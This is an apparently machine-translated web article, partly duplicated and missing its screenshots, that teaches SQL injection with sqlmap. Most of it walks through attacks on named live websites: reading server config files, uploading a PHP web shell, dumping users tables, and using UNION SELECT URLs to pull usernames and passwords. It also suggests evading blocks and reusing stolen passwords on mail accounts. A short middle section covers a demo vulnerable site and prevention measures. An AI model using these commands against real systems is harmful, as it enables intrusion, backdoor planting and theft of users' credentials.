home > Computer > Filling the shell using sql injection. Loading the shell with SQLmap

Filling the shell using sql injection. Loading the shell with SQLmap

Well, to the subject:

Spoiler: Fill the shell

We have a SQL Injection on the site that looks like this:

You must be registered to see links.

The first thing we want to do is check whether we have privileges to write files on the attacked resource; to do this, load the terminal and issue the following command:

Sqlmap –u http://www.sacoor.com/site_terms.php?lang=en --banner --current-db --current-user --is-dba

Click Enter and the analysis of our SQL Injection begins, the report looks like this:

As you can see in the report, the version of Apache, the version of MySQL, and the version of the OS installed on the server are written, all this will be useful to us in the future, but most importantly, you can see that we have rights to write files, this is displayed in the line Current User is DBA: True

The next step for us is to obtain the paths to record our shell. We can get the path to our site on the server by downloading the file httpd.conf. We get information about the location of the httpd.conf file from using Google, you can search by the version of the OS that is installed or by the list of the most likely paths. In general, I will not delve into surfing search engines, just when you have found out the most likely location of the path to the file, then it’s time to download this same file to your disk, to do this, enter the following command and request to read the file on the server:

Sqlmap –u http://www.sacoor.com/site_terms.php?lang=en --file-read=/etc/httpd/conf/httpd.conf

Let us immediately note that it is not always possible to find this config file the first time, so you can use the most likely paths where this file may be located:

LIST OF POSSIBLE PATHS TO THE CONFIG FILE:

../../../../../../../../../usr/local/apache/conf/httpd.conf ../../../../ ../../../../../usr/local/apache2/conf/httpd.conf ../../../../../../../../ usr/local/apache/httpd.conf ../../../../../../../../usr/local/apache2/httpd.conf ../../.. /../../../../../usr/local/httpd/conf/httpd.conf ../../../../../../../usr/ local/etc/apache/conf/httpd.conf ../../../../../../../usr/local/etc/apache2/conf/httpd.conf ../.. /../../../../../usr/local/etc/httpd/conf/httpd.conf ../../../../../../../ usr/apache2/conf/httpd.conf ../../../../../../../usr/apache/conf/httpd.conf ../../../.. /../../../usr/local/apps/apache2/conf/httpd.conf ../../../../../../../usr/local/apps/ apache/conf/httpd.conf ../../../../../../etc/apache/conf/httpd.conf ../../../../../. ./etc/apache2/conf/httpd.conf ../../../../../../etc/httpd/conf/httpd.conf ../../../../ ../../etc/http/conf/httpd.conf ../../../../../../etc/apache2/httpd.conf ../../../. ./../../etc/httpd/httpd.conf ../../../../../../etc/http/httpd.conf ../../../. ./../../etc/httpd.conf ../../../../../opt/apache/conf/httpd.conf ../../../../. ./opt/apache2/conf/httpd.conf ../../../../var/www/conf/httpd.conf ../conf/httpd.conf

We receive a report from sqlmap in the following form:

As you can see, sqlmap told us that the file is the same size as the file on the server, therefore we have the right to read this file. If there were not enough rights to read this file, then an error would appear that the file saved on our machine has a different size than the file on the server, or there is no file on the server at the path we specified and never has been. Sqlmap saved our file in the report files, and to read it we need to launch the window manager. To launch the window manager, we open another terminal window and enter the command:

Next, in the manager that opens, we follow the path where sqlmap added the file, i.e.:
/root/.sqlmap/output/sacoor.com
Next, hover the cursor over the file and press the button F3 on the keyboard and read the Apache config file:

From our config file we see that our site is located on the server at the following path:
/home/sbshop/site/

Now that we have a little information, we can try to fill the shell, to do this we enter the following command:

After entering the command, sqlmap will ask what type of filler we want to use, because... in our case, the site is in PHP, then we will upload PHP-loader, select point 4 and press Enter. Next, sqlmap will ask us to choose where we will upload our loader, and since... we already know the path to our site on the server, then select point 2, press Enter and specify the path to the site:
/home/sbshop/site/

And after that we press Enter and we see the following report:

In this case, sqlmap tells us that in this folder We don't have write rights. No problem, this problem is quite easy to solve. We give the command to launch uniscan and check files and folders for writability, here is the command:

Uniscan -u http://www.sacoor.com/ -qwe

Now the scanner will check all writable directories:

The scanner found three directories with the ability to write files, so we are trying to load our shell loader again, but this time in a different way. Run the command again:

Sqlmap –u http://www.sacoor.com/site_terms.php?lang=en --os-cmd –v l

and by selecting point 4(filling the PHP script), specify the path:
/home/sbshop/site/admin

We see the following.

SQL injection is an attack that exploits dynamic SQL statements by commenting out certain parts of statements or adding a condition that will always be true. It targets holes in web application architecture and uses SQL statements to execute malicious SQL code:

In this article, we will look at the techniques used in SQL injections and how to protect web applications from such attacks.

How SQL injection works

The types of attacks that can be carried out using SQL injection vary based on the type of database engines that are affected. The attack targets dynamic SQL statements. A dynamic statement is a statement that is created at run time based on parameters from a web form or URI query string.

Consider a simple web application with a login form. The HTML form code is below:

The form accepts an email address and then a password is sent to PHP file named index.php ;
The session is stored in cookie. This feature is enabled by checking the remember_me flag. The post method is used to send data. This means that the values are not displayed in the URL.

Let's assume that the request to check the user ID on the server side looks like this:

The request uses the $_POST array values directly without sanitizing it;
The password is encrypted using the MD5 algorithm.

We will look at an attack using SQL injection sqlfiddle. Open the URL http://sqlfiddle.com/ in your browser. The following window will appear on the screen.

Note: You will need to write SQL statements:

Step 1: Enter this code in the left panel:

CREATE TABLE `users` (`id` INT NOT NULL AUTO_INCREMENT, `email` VARCHAR(45) NULL, `password` VARCHAR(45) NULL, PRIMARY KEY (`id`)); insert into users (email,password) values (" [email protected]",md5("abc"));

Step 2: Click the button Build Schema».
Step 3: Enter the below code in the right pane:

select * from users;

Step 4: Click " Run SQL" You will see the following result:

Let's assume the user provides an email address [email protected] and 1234 as the password. The query that needs to be executed on the database might look like this:

The example SQL injection code above can be bypassed by commenting out part of the password and adding a condition that will always be true. Let's assume that an attacker inserts the following data into the email address field:

[email protected]" OR 1 = 1 LIMIT 1 -- " ]

and xxx in the password field.

Generated dynamic operator will look like this:

[email protected] ends with a single quote, which terminates the string;
OR 1 = 1 LIMIT 1 is a condition that will always be true and limits the results returned to just one record.

0; ‘ AND ... is an SQL comment that excludes the password part.

Copy the above query and paste it into the FiddleRun SQL text box as shown below:

Hacker activity: SQL injections into web applications

We have a simple web application available at http://www.techpanda.org/ that is specifically made vulnerable to SQL injection attacks for beginners for demonstration purposes. The HTML form code given above is taken from the authorization page of this application.

It provides basic security such as email field sanitization. This means that the above code cannot be used to bypass this mechanism.

To bypass this, you can use the password field. The diagram below shows the steps you need to follow:

Let's assume that the attacker provides the following data:

Step 1: Enter [email protected] as an email address;
Step 2: Enter xxx’) OR 1 = 1 - ] ;

Clicks the “Submit” button.

It will be sent to the administration panel. The generated query will look like this:

The diagram below shows how the request was generated:

Here:

The request assumes that md5 encryption is used;
A closing single quote and parenthesis are used;
A condition is added to the operator that will always be true.

Typically, attackers try to use several different methods in an SQL injection attack to achieve their goals.

Other types of SQL injection attacks

SQL injections can cause much more damage than logging into a system by bypassing the authorization mechanism. Some of these attacks may:

Perform data deletion;
Perform data update;
Add data;
Execute commands on the server that will download and install malicious programs;
Export to remote server attacker of valuable data, such as details credit card, Email and passwords.

The above list is not complete. It simply gives an idea of the dangers SQL injections pose.

Tools for automating SQL injections

In the above example, we used manual attack methods. Before performing an SQL injection, you need to understand that there are automated tools that allow you to carry out attacks more efficiently and quickly:

SQLSmack ;
SQLPing 2 ;
SQLMap.

How to prevent SQL injections

Here are a few simple rules, which will allow you to protect against attacks using SQL injections:

User input should not be trusted. It always needs to be sanitized before the data is used in dynamic SQL operations.

Stored procedures- They can encapsulate SQL queries and process all input data as parameters.

Prepared queries- Queries are created first, and then all provided user data is processed as parameters. This does not affect the SQL statement syntax.

Regular Expressions- can be used to potentially detect malicious code and removing it before executing SQL statements.

Access rights to connect to the database- to protect against SQL injections, accounts that are used to connect to the database should be granted only the necessary access rights. This will help limit the actions that SQL statements can perform on the server.

Error messages- must not be disclosed confidential information. Simple custom error messages such as " Sorry, it arose a technical error. The support team has already been notified about it. Please try again later", can be used instead of displaying SQL queries that caused the error.

Spoiler: .ZEN

We have a SQL Injection on the site that looks like this:

The first thing we want to do is check whether we have privileges to write files on the attacked resource; to do this, load the terminal and issue the following command:

Http://www.sacoor.com/site_terms.php?lang=en --banner --current-db --current-user --is-dba

We press Enter and the analysis of our SQL Injection begins, the report looks like this:

As you can see in the report, the version of Apache, the version of MySQL, and the version of the OS installed on the server are written, all this will be useful to us in the future, but most importantly, you can see that we have rights to write files, this is displayed in the line Current User is DBA: True

The next step for us is to obtain the paths to record our shell. We can get the path to our site on the server by downloading the httpd.conf file. We get information about the location of the httpd.conf file using Google; you can search by the version of the OS that is installed or by the list of the most likely paths. In general, I won’t go deep into surfing search engines, just when you have found out the most likely location of the path to the file, then it’s time to download this same file to your disk, to do this, enter the following command and request reading the file on the server:

Sqlmap –u http://www.sacoor.com/site_terms.php?lang=en --file-read=/etc/httpd/conf/httpd.conf

Let us immediately note that it is not always possible to find this config file the first time, so you can use the most likely paths where this file may be located:

LIST OF POSSIBLE PATHS TO THE CONFIG FILE:

We receive a report from sqlmap in the following form:

As you can see, sqlmap told us that the file has the same size as the file on the server, therefore we have the right to read this file. If there were not enough rights to read this file, then an error would appear that the file saved on our machine has a different size than the file on the server, or there is no file on the server at the path we specified and never has been. Sqlmap saved our file in the report files, and to read it we need to launch the window manager. To launch the window manager, we open another terminal window and enter the command:

Next, in the manager that opens, we follow the path where sqlmap added the file, i.e.:
/root/.sqlmap/output/sacoor.com
Next, hover the cursor over the file, press the F3 button on the keyboard and read the Apache config file:

From our config file we see that our site is located on the server at the following path:
/home/sbshop/site/

Now that we have a little information, we can try to fill the shell, to do this we enter the following command:

Sqlmap –u http://www.sacoor.com/site_terms.php?lang=en --os-cmd –v l

After entering the command, sqlmap will ask what type of filler we want to use, because... in our case, the site is in PHP, then we will upload PHP-loader, select item 4 and press Enter. Next, sqlmap will ask us to choose where we will upload our loader, and since... We already know the path to our site on the server, then select item 2, press Enter and indicate the path to the site:
/home/sbshop/site/

And after that, press Enter and see the following report:

In this case, sqlmap tells us that we do not have write rights to this folder. No problem, this problem is quite easy to solve. We give the command to launch uniscan and check files and folders for writability, here is the command.

What is sqlmap and what is it for?

The program allows you to check sites for SQL injection vulnerabilities, XSS vulnerabilities, and also exploit SQL injection. Various types of SQL injections and a variety of databases are supported.

What can you do with sqlmap

With sqlmap you can:

check if websites have vulnerabilities

If the site is vulnerable to SQL injection, then it is possible:

receive information from the database, including dump (the entire) database
modify and delete information from the database
upload a shell (backdoor) to a web server

One of the scenarios for using sqlmap:

Getting username and password from database
Search for site administration panels (admin panel)
Login to the admin panel with the received login and password

If there is a vulnerability, the attack can develop in various directions:

Data modification
Filling the backdoor
Injecting JavaScript code to obtain user data
Implementing code for hooking on BeEF

As we can see, SQL injection is a very dangerous vulnerability that gives an attacker great opportunities.

Checking websites using sqlmap

If the site receives data from the user GET method(when both the name of the variable and the transmitted data are visible in the address bar of the browser), then you need to select the address of the page in which this variable is present. It comes after the question mark ( ? ), For example:

http://www.dwib.org/faq2.php?id=8
http://www.wellerpools.com/news-read.php?id=22
http://newsandviews24.com/read.php?id=p_36

In the first address, the variable name is id, and the passed value is 8 . In the second address the variable name is also id, and the transmitted value 22 . In the third example, the variable name is the same, but the value being passed is p_36. Same name a variable is a random match for different sites, it can be anything, the transmitted data can be anything, there can be several variables with values separated by a symbol & .

If we want to check whether the id variable is vulnerable to SQL injection, then we need to enter the entire address - http://www.dwib.org/faq2.php?id=8 (not http://www.dwib.org /faq2.php or http://www.dwib.org).

The command to check a variable passed by the GET method is very simple:

Sqlmap -u site_address

For these sites the commands will be:

Sqlmap -u http://www.dwib.org/faq2.php?id=8 sqlmap -u http://www.wellerpools.com/news-read.php?id=22 sqlmap -u http://newsandviews24 .com/read.php?id=p_36

During the verification process, sqlmap may ask various questions and you need to answer them y(i.e. Yes) or n(i.e. No). The letter y and n can be capital or small. The capital letter means the default choice, if you agree with it, then just press Enter.

Examples of situations and questions:

Heuristics detected that the target is protected by some kind of WAF/IPS/IDS do you want sqlmap to try to detect backend WAF/IPS/IDS?

Heuristics determined that the target is protected by some kind of WAF/IPS/IDS. Do you want sqlmap to try to determine the name of the WAF/IPS/IDS?

My favorite request:

Heuristic (basic) test shows that GET parameter "id" might be injectable (possible DBMS: "MySQL") testing for SQL injection on GET parameter "id" it looks like the back-end DBMS is "MySQL". Do you want to skip test payloads specific for other DBMSes?

The point is that the heuristics have determined that the parameter may be vulnerable and the remote DBMS has already been identified, we are asked if we want to continue the check. And in the second screenshot, the site is also vulnerable to XSS.

If you want to automate the process so that sqlmap doesn't ask you every time, but use the default selection (there's always best options), then you can run the command with the option --batch:

Sqlmap -u http://www.dwib.org/faq2.php?id=8 --batch

Possible problems when scanning sqlmap

The following errors may appear:

Connection timed out to the target URL. sqlmap is going to retry the request(s) if the problem persists please check that the provided target URL is valid. In case that it is, you can try to rerun with the switch "--random-agent" turned on and/or proxy switches ("--ignore-proxy", "--proxy",...)

It means that the website does not want to “talk” to sqlmap. As an option we are offered to use --random-agent. If you can watch the site in the browser, but sqlmap writes about the impossibility of connecting, then the site is ignoring requests, focusing on the user agent. The --random-agent option changes the standard sqlmap value to random:

Sqlmap -u http://www.wellerpools.com/news-read.php?id=22 --random-agent

Another reason for this error could be that your IP is blocked by a website - then you need to use a proxy. If you are already using a proxy and this error appears, it may mean that the proxy has communication problems and you should try without it.

sqlmap scan results

The detected SQL injections are displayed as follows:

Those. are highlighted in bold green color, the name of the vulnerable parameter is written, the type of SQL vulnerability and there is the word injectable.

Getting a list of databases with sqlmap

To get a list of databases, use the option --dbs. Examples:

Sqlmap -u http://www.dwib.org/faq2.php?id=8 --dbs sqlmap -u http://www.wellerpools.com/news-read.php?id=22 --random-agent --dbs sqlmap -u http://newsandviews24.com/read.php?id=p_36 --dbs

Retrieving information from databases

For example, two databases were found for the site wellerpools.com:

[*] information_schema [*] main_wellerpools

I want to know the list of tables in the main_wellerpools database. To do this, use the option --tables. In addition to it, we need to indicate the table we are interested in after the option -D:

Sqlmap -u http://www.wellerpools.com/news-read.php?id=22 --random-agent -D main_wellerpools --tables

List of tables:

For some reason, I want to know the list of columns from the users table. To do this, use the option --columns. In addition to it, we need to indicate the database we are interested in ( -D main_wellerpools) and after the key -T the table for which we want to see a list of columns:

Sqlmap -u http://www.wellerpools.com/news-read.php?id=22 --random-agent -D main_wellerpools -T users --columns

To display the content, use the option --dump. It can be specified together with the database, and then a dump of the entire database will be made, or you can limit the data to one table or even one column. With the following command I want to see the contents of the entire users table:

Sqlmap -u http://www.wellerpools.com/news-read.php?id=22 --random-agent -D main_wellerpools -T users --dump

Take a look at the passwords - upon a quick inspection, I thought they were hashes. The admins really tried to defend themselves, but it didn’t help them.

By the way, since the parameter that accepts data sent by the GET method is vulnerable, you can form a request directly in the browser line in such a way that the user’s login and password will be displayed directly on the site itself:

http://www.wellerpools.com/news-read.php?id=-22+union+select+1,group_concat(user_name,0x3a,user_pwd),3,4,5,6,7,8,9, 10+from+users--
http://www.wellerpools.com/news-read.php?id=-22+UNION+SELECT+1,group_concat(user_id,0x3e,user_name,0x3e,user_pwd),3,4,5,6,7, 8,9,10+from+users--

Those. We have the username, password and email of users (and most likely even administrators) of the site. If you can find the site's administrative panel, you can gain control of the site or web server. Considering the love of users for the same passwords and knowing them mailboxes- You can try to hack your mail.

In general, SQL injection is a very dangerous vulnerability.

07.11.2021

Computer

The most interesting: